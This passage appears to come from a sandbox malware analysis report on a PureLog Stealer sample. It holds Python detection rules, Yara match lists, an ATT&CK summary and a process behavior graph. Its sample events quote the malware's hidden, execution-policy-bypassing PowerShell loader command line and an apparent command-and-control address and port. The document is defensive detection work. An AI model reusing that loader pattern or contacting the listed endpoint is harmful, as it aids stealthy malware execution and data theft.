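    if img in {"powershell.exe", "pwsh.exe"}:
        if EP_BYPASS.search(ev.cmdline):
            findings.append("powershell_execution_policy_bypass")
        if HIDDEN_WINDOW.search(ev.cmdline):
            findings.append("powershell_hidden_window")
        m = SCRIPT_ARG.search(ev.cmdline)
        if m and SUSPICIOUS_DIRS.search(m.group(1)):
            findings.append("script_execution_from_temp")
    if img in {"csc.exe", "vbc.exe"}:
        m = RESPONSE_FILE.search(ev.cmdline)
        if m and SUSPICIOUS_DIRS.search(m.group(1)):
            findings.append("dotnet_compiler_from_suspicious_location")
    return findings


def evaluate_network(ev: NetEvent) -> list[str]:
    """Return the rule names a network-connection event triggers."""
    findings = []
    if basename(ev.image) in SHELL_PROCESSES:
        findings.append("system_process_network_connect")
        if ev.dst_port not in STANDARD_PORTS:
            findings.append("non_standard_port")
    return findings


def triage(proc_events, net_events) -> dict[str, list[str]]:
    """Collapse every hit per process image (sorted, de-duplicated) for a quick verdict."""
    hits: dict[str, list[str]] = {}
    for ev in proc_events:
        for rule in evaluate_process(ev):
            hits.setdefault(basename(ev.image), []).append(rule)
    for ev in net_events:
        for rule in evaluate_network(ev):
            hits.setdefault(basename(ev.image), []).append(rule)
    return {img: sorted(set(rules)) for img, rules in hits.items()}


# Constructed events; the first two process events and both explorer.exe connections
# reuse the command lines and endpoints quoted in this report. The rest are benign controls.
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
              r'-WindowStyle Hidden -NonInteractive -File '
              r'"C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"',
              r"C:\Users\user\Desktop\PI1qW7yV9K.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign control
              r'powershell.exe -NoProfile -File "C:\Scripts\nightly-backup.ps1"',
              r"C:\Windows\System32\svchost.exe"),
]
SAMPLE_NETS = [
    NetEvent(r"C:\Windows\explorer.exe", "85.192.49.163", 4782),
    NetEvent(r"C:\Windows\explorer.exe", "15.204.213.5", 443),
    NetEvent(r"C:\Program Files\Browser\browser.exe", "203.0.113.10", 443),  # benign control
]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_PROCS, SAMPLE_NETS).items():
        print(f"{image}: {', '.join(rules)}")
```

The parameter-prefix regexes matter in practice: a rule that only matches the literal string "-ExecutionPolicy Bypass" misses "-ep bypass" and "-exec bypass", which are at least as common in loaders as the spelled-out form seen here. The explorer.exe rule is deliberately coarse; on a real endpoint, tune SHELL_PROCESSES and STANDARD_PORTS to the baseline of the fleet rather than to one sandbox run.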

Stealing of Sensitive Information

Source: Yara match; File source: PI1qW7yV9K.exe, type: SAMPLE
Source: Yara match; File source: 2.2.powershell.exe.2321d350000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.2321d350000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.PI1qW7yV9K.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.23216460cf8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.23216460cf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1712421715.000002321D350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1548348801.0000023216460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1332889262.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match; File source: PI1qW7yV9K.exe, type: SAMPLE
Source: Yara match; File source: 2.2.powershell.exe.2321d350000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.2321d350000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.PI1qW7yV9K.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.23216460cf8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.23216460cf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1712421715.000002321D350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1548348801.0000023216460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1332889262.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques with matched signatures, grouped by tactic. The digits in parentheses are the signature-count badges exactly as rendered on the original matrix; matrix cells without a badge (techniques not observed in this analysis) are omitted.

Execution: Windows Management Instrumentation (231); Native API (1); PowerShell (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1); Process Injection (411)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (2); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (51); Process Injection (411); Hidden Files and Directories (1)
Discovery: File and Directory Discovery (2); System Information Discovery (33); Security Software Discovery (221); Virtualization/Sandbox Evasion (51); Process Discovery (2); Application Window Discovery (1); System Network Configuration Discovery (1)
Collection: Archive Collected Data (11)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)
No matched techniques: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact
Behavior Graph

ID: 1665177; Sample: PI1qW7yV9K.exe; Start date: 15/04/2025; Architecture: WINDOWS; Score: 100
Numbers in square brackets after a process name are the graph's created-files / created-registry-values badges as rendered.

Sample-level DNS/IP nodes: pki-goog.l.google.com; ipwho.is; 2 other IPs or domains
Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected PureLog Stealer; 8 other signatures

PI1qW7yV9K.exe [3] (started)
    dropped: ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1 (ASCII); C:\Users\user\AppData\...\PI1qW7yV9K.exe.log (CSV)
    signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
    powershell.exe [22] (started)
        dropped: C:\Users\user\AppData\...\akylvhfm.cmdline (Unicode)
        signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
        explorer.exe [49 3] (injected)
            network: 85.192.49.163, 4782, 49692, 49697 (DINET-ASRU, Russian Federation); ipwho.is 15.204.213.5, 443, 49695 (HP-INTERNET-ASUS, United States)
            signatures: System process connects to network (likely due to code injection or exploit); Hides that the sample has been downloaded from the Internet (zone.identifier)
        svchost.exe (injected)
            signatures: Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes); Queries temperature or sensor information (via WMI often done to detect virtual machines)
            WMIADAP.exe [4] (started)
        csc.exe [3] (started)
            dropped: C:\Users\user\AppData\Local\...\akylvhfm.dll (PE32)
            cvtres.exe [1] (started)
        2 other processes
    conhost.exe (started)
